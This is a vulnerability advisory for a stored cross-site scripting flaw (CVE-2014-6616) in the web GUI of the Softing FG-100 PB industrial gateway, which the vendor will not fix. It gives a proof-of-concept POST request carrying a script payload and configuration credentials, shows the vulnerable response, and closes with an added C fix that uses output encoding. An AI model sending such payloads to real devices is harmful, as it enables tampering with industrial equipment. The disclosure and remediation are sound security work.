Softing FG-100 PB Cross Site Scripting

2014.11.06
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product:  Softing FG-100 PB
# Vendor:   Softing AG (www.softing.com)
# CVD ID:   CVE-2014-6616
# Subject:  XSS
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Johannes Klick
#           Daniel Marzin
#           Ingmar Rosenhagen
# Date:     05.11.2014
#
#############################################################

Introduction:
-------------
Softing FG PROFIBUS [1] is a family of interfaces for remote access to one,
two or three PROFIBUS segments via Ethernet for device parameterization,
controller programming and data acquisition. The device is used in industrial
setups to make PROFIBUS devices available via Ethernet.

Compass Security Deutschland GmbH [2] discovered a security flaw in the web
GUI of the device which allows execution of malicious code in the context of
the user's browser session.

Affected:
---------
Firmware: FG-x00-PB_V2.02.0.00

Technical Description:
----------------------
The web GUI does not properly encode user-supplied data on output in at least
one place. Exploiting this vulnerability leads to stored cross-site scripting
(XSS) and allows execution of JavaScript code.

The vulnerable resource is the 'DEVICE_NAME' parameter:

POST /cgi-bin/CFGhttp HTTP/1.1
Host: 192.168.2.3
Referer: http://192.168.2.3/cgi-bin/CFGhttp

second_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&DEVICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168.2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0&GATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_ORG=192.168.212.231&STARTUP=RELOAD

This results in the malicious code being embedded in the response:

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache, must-revalidate
Pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Device Configuration</title></head><link rel="stylesheet" type="text/css" href="../fg300_pb/styles/fg300_pb.css"><body><h1>New Network Settings</h1><table cellspacing=0 summary="">
<tr><td><strong> Host Name </strong></td><td> <SCRIPT>alert("XSS")</SCRIPT> </td><td> </td></tr>
<tr><td><strong> IP Address </strong></td><td> 192.168.2.3 </td><td> </td></tr>
<tr><td><strong> Subnet Mask </strong></td><td> 255.255.255.0 </td><td> </td></tr>
<tr><td><strong> Default Gateway </strong></td><td> </td><td> </td></tr>
<tr><td><strong> Maintenance IP Address </strong></td><td> 192.168.212.231 </td><td> </td></tr>
<tr><td><strong> New network parameters will be used </strong></td><td> immediately </td><td></td></tr>
</table><br></body></html>

Workaround / Fix:
-----------------
No patch is available.

Timeline:
---------
Vendor Notified: 2014-09-15
Vendor Response: 2014-10-24
Vendor Status:   Won't fix

References:
-----------
[1]: http://industrial.softing.com/de/produkte/profibus-master-or-slave-configurable-single-channel-remote-interface.html
[2]: http://www.csnc.de
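The fix the advisory calls for is output encoding of DEVICE_NAME before it is placed in the "Host Name" cell, plus input validation as defence in depth. The following is an added example written for this page, not code from Compass Security or from Softing's CFGhttp firmware; the function names html_escape, is_valid_device_name and render_host_name_row are hypothetical.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Encode the characters significant in an HTML text context. Returns bytes
   written (without the NUL) or -1 if out is too small. Hypothetical helper. */
long html_escape(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    for (; *in; in++) {
        char one[2] = { *in, 0 };
        const char *rep;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (n + rl + 1 > outlen) return -1;   /* refuse to truncate an entity */
        memcpy(out + n, rep, rl);
        n += rl;
    }
    out[n] = '\0';
    return (long)n;
}

/* Defence in depth: validate DEVICE_NAME on input as a host label
   (letters, digits, hyphens; 1..63 chars) so a payload is never stored. */
int is_valid_device_name(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len > 63) return 0;
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)name[i]) && name[i] != '-') return 0;
    return 1;
}

/* Render the "Host Name" row of the settings table with the value encoded,
   instead of embedding it raw as the vulnerable firmware does. */
int render_host_name_row(const char *device_name, char *out, size_t outlen)
{
    char esc[512];
    if (html_escape(device_name, esc, sizeof esc) < 0) return -1;
    int w = snprintf(out, outlen,
        "<tr><td><strong> Host Name </strong></td><td> %s </td><td> </td></tr>", esc);
    return (w < 0 || (size_t)w >= outlen) ? -1 : w;
}
```

With the advisory's DEVICE_NAME value, html_escape yields `&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;`, which the browser displays as text, and is_valid_device_name rejects the value before it is stored at all.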

References:

http://industrial.softing.com/de/produkte/profibus-master-or-slave-configurable-single-channel-remote-interface.html

